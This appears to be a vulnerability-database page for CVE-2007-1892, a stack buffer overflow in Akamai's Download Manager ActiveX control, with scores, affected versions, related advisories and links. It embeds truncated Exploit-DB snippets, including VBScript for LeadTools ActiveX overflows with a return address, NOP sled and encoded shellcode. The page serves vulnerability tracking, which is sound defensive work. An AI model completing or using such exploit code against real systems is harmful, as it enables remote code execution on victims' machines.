CVE-2007-1892
published 2007-04-18CVE-2007-1892: Stack-based buffer overflow in Akamai Technologies Download Manager ActiveX Control (DownloadManagerV2.ocx) before 2.2.1.0 allows remote attackers to execute…
PriorityP344critical9.3CVSS 2.0
AVNACMAuNCCICAC
EPSS
5.59%
91.9th percentile
Stack-based buffer overflow in Akamai Technologies Download Manager ActiveX Control (DownloadManagerV2.ocx) before 2.2.1.0 allows remote attackers to execute arbitrary code via unspecified vectors, a different issue than CVE-2007-1891.
Affected
6 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| akamai_technologies | download_manager | <= 2.2.4.3 | — |
| akamai_technologies | download_manager | — | — |
| akamai_technologies | download_manager | — | — |
| akamai_technologies | download_manager | — | — |
| akamai_technologies | download_manager | — | — |
| akamai_technologies | download_manager | — | — |
Stop checking back — get the weekly exploitation signal.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-mmg7-q8j9-f8wj: Stack-based buffer overflow in manager
ghsa_unreviewed·2022-05-02·CVSS 9.3
CVE-2009-2582 [CRITICAL] CWE-119 GHSA-mmg7-q8j9-f8wj: Stack-based buffer overflow in manager
Stack-based buffer overflow in manager.exe in Akamai Download Manager (aka DLM or dlmanager) before 2.2.4.8 allows remote web servers to execute arbitrary code via a malformed HTTP response during a Redswoosh download, a different vulnerability than CVE-2007-1891 and CVE-2007-1892.
GHSA
GHSA-6j77-pv9h-rxpf: Stack-based buffer overflow in Akamai Technologies Download Manager ActiveX Control (DownloadManagerV2
ghsa_unreviewed·2022-05-01·CVSS 9.3
CVE-2007-1892 [CRITICAL] GHSA-6j77-pv9h-rxpf: Stack-based buffer overflow in Akamai Technologies Download Manager ActiveX Control (DownloadManagerV2
Stack-based buffer overflow in Akamai Technologies Download Manager ActiveX Control (DownloadManagerV2.ocx) before 2.2.1.0 allows remote attackers to execute arbitrary code via unspecified vectors, a different issue than CVE-2007-1891.
No detection rules found.
Exploit-DB
SharePoint 2007/2010 and DotNetNuke < 6 - File Disclosure (via XEE)
exploitdb·2011-09-20·CVSS 4.0
CVE-2011-1892 [MEDIUM] SharePoint 2007/2010 and DotNetNuke < 6 - File Disclosure (via XEE)
SharePoint 2007/2010 and DotNetNuke
]>
&boom;
poc filename: xee.xsl
Exploit-DB
LeadTools Raster Thumbnail Object Library - 'LTRTM14e.dll' Remote Buffer Overflow
exploitdb·2007-05-18
CVE-2007-2787 LeadTools Raster Thumbnail Object Library - 'LTRTM14e.dll' Remote Buffer Overflow
LeadTools Raster Thumbnail Object Library - 'LTRTM14e.dll' Remote Buffer Overflow
---
2007/05/20
LeadTools Raster Thumbnail Object Library (LTRTM14e.DLL v. 14.5.0.44) Remote Stack-Based Buffer Overflow
url: http://www.leadtools.com/
peice: eheheh, take a look at thier site :)
author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://shinnai.altervista.org
Tested on Windows XP Professional SP2 full patched with Internet Explorer 7
This exploits just open calc.exe
Sub tryMe
buff = String(1892, "A")
get_EIP = unescape("%EB%AA%3F%7E") 'call ESP (from user32.dll)
buff2 = String(40, "A")
nop = String(16, unescape("%90"))
shellcode = unescape("%eb%03%59%eb%05%e8%f8%ff%ff%ff%4f%49%49%49%49%49") & _
unescape("%49%51%5a%56%54%58%36%33%30%56%58%34%41%30%42%36") & _
unescape("%48%48%
Exploit-DB
LeadTools Thumbnail Browser Control - 'lttmb14E.ocx' Remote Buffer Overflow
exploitdb·2007-05-18
CVE-2007-2787 LeadTools Thumbnail Browser Control - 'lttmb14E.ocx' Remote Buffer Overflow
LeadTools Thumbnail Browser Control - 'lttmb14E.ocx' Remote Buffer Overflow
---
2007/05/19
LeadTools Thumbnail Browser Control (lttmb14E.ocx v. 14.5.0.44) Remote Stack-Based Buffer Overflow
url: http://www.leadtools.com/
peice: eheheh, take a look at thier site :)
author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://shinnai.altervista.org
Tested on Windows XP Professional SP2 full patched with Internet Explorer 7
This exploits just open calc.exe
Sub tryMe()
buff = String(1892, "A")
get_EIP = unescape("%EB%AA%3F%7E") 'call ESP (from user32.dll)
buff2 = String(40, "A")
nop = String(16, unescape("%90"))
shellcode = unescape("%eb%03%59%eb%05%e8%f8%ff%ff%ff%4f%49%49%49%49%49") & _
unescape("%49%51%5a%56%54%58%36%33%30%56%58%34%41%30%42%36") & _
unescape("%48%48%30%42%33%3
No writeups or analysis indexed.
http://secunia.com/advisories/24900http://www.osvdb.org/34324http://www.securityfocus.com/archive/1/465908/100/0/threadedhttp://www.securityfocus.com/bid/23522http://www.vupen.com/english/advisories/2007/1415https://exchange.xforce.ibmcloud.com/vulnerabilities/33697http://secunia.com/advisories/24900http://www.osvdb.org/34324http://www.securityfocus.com/archive/1/465908/100/0/threadedhttp://www.securityfocus.com/bid/23522http://www.vupen.com/english/advisories/2007/1415https://exchange.xforce.ibmcloud.com/vulnerabilities/33697
2007-04-18
Published